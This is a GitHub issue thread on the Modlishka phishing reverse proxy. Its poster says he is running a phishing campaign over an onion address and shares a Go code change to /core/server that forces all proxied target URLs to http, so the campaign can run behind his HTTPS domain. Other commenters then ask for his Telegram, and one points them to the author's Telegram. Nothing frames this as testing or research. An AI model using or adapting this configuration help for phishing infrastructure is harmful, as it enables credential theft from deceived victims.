### ISSUE TITLE
Proxying http onto a https domain

### ISSUE THREAD

**Issue by Eddiethedude** [drk1wi/Modlishka#296]
I'm trying to connect an onion address to my https domain. So I'm using privoxy as my socks connector at port 8118. I can connect via http with certificate errors but I can't connect by https. 
If I run the phishing campaign on an onion address it works great but I want to run it across a https domain

What would I need to change in the settings to force all requests to be http but through my https domain?
I've tried force http but then I can't connect by https which is what I want to achieve

**Comment by Eddiethedude** [comment]
I guess what I'm looking for is a way to reverse proxy http to https

**Comment by Eddiethedude** [comment]
Sorry to waste your time I found a quick solution.

In /core/server I changed:

                        if TLSvalue == false {
                                targetURL="http://"+ targetDomain
                        } else {
                                targetURL="https://"+targetDomain
                        }

        } else {

                if r.TLS != nil {
                        targetURL="http://"+targetDomain
                } else {
                        targetURL="https://"+targetDomain
                }
        }

to

                        if TLSvalue == false {
                                targetURL="http://"+ targetDomain
                        } else {
                                targetURL="http://"+targetDomain
                        }

        } else {

                if r.TLS != nil {
                        targetURL="http://"+targetDomain
                } else {
                        targetURL="http://"+targetDomain
                }
        }

**Comment by Westsideff** [comment]
Eddie send your telegram

**Comment by George152-max** [comment]
@Eddiethedude yo need to ask you some questions where can I reach you

**Comment by Rensodark** [comment]
You can reach out to @drk1wi on telegram
